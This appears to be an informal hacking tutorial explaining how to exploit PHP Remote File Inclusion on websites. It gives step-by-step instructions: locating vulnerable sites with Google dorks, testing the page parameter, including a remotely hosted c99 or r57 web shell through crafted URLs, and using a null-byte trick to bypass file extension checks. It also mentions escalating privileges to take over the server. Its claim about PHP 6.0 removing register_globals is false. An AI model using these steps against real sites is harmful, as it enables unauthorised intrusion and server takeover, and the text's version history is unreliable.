Remote File Inclusion occurs when a remote file, usually a shell (a graphical interface for browsing remote files and running your own code on a server), is included into a website which allows the hacker to execute server side commands as the current logged on user, and have access to files on the server. With this power the hacker can continue on to use local exploits to escalate his privileges and take over the whole system.
Many servers are vulnerable to this kind of attack because of PHP’s default settings of register_globals and allow_url_fopen being enabled. Although as of PHP 6.0, register_globals has been depreciated and removed, many websites still rely on older versions of PHP to run their web applications. Now let’s go through the steps a hacker would take to exploit this type of vulnerability in a website.
First the hacker would find a website that gets its pages via the PHP include() function and is vulnerable to RFI. Many hackers use Google dorks to locate servers vulnerable to RFI. A Google dork is the act of using Google’s provided search tools to help get a specific search result
2. Website that include pages have a navigation system similar to: http://target-site.com/index.php?page=PageName
3. To see if a the page is vulnerable, the hacker would try to include a site instead of PageName like the following:http://target-site.com/index.php?page=http://www.google.com
4. If google shows up then the website is vulnerable thats our profit . and we will continue to upload the shell.
5. A elite hacker will program his own shell but a script kidie would just grab a shell from google and upload it some of the popular shells c99 and r57 just google them and get em. At the end of the URL make sure to add a ? so that if anything comes after c99.txt ,it will be passed to the shell and not cause any problems. The new URL will look like : http://target-site.com/index.php?page=http://site.com/c99.txt?
Sometimes the PHP script on the server appends “.php” to the end of every included file. So if you included the shell, it would end up looking like “c99.txt.php” and not work. To get around this, you would add a null byte (%00) to the end of c99.txt. This tells the server to ignore everything after c99.txt
Note: you can also search the sites vulnerable to this type of attack by using a google dork. Just type this in google search and all sites vulnerable to this attack will come up allinurl:.php?page= and if you succeed in getting the server to parse the shell.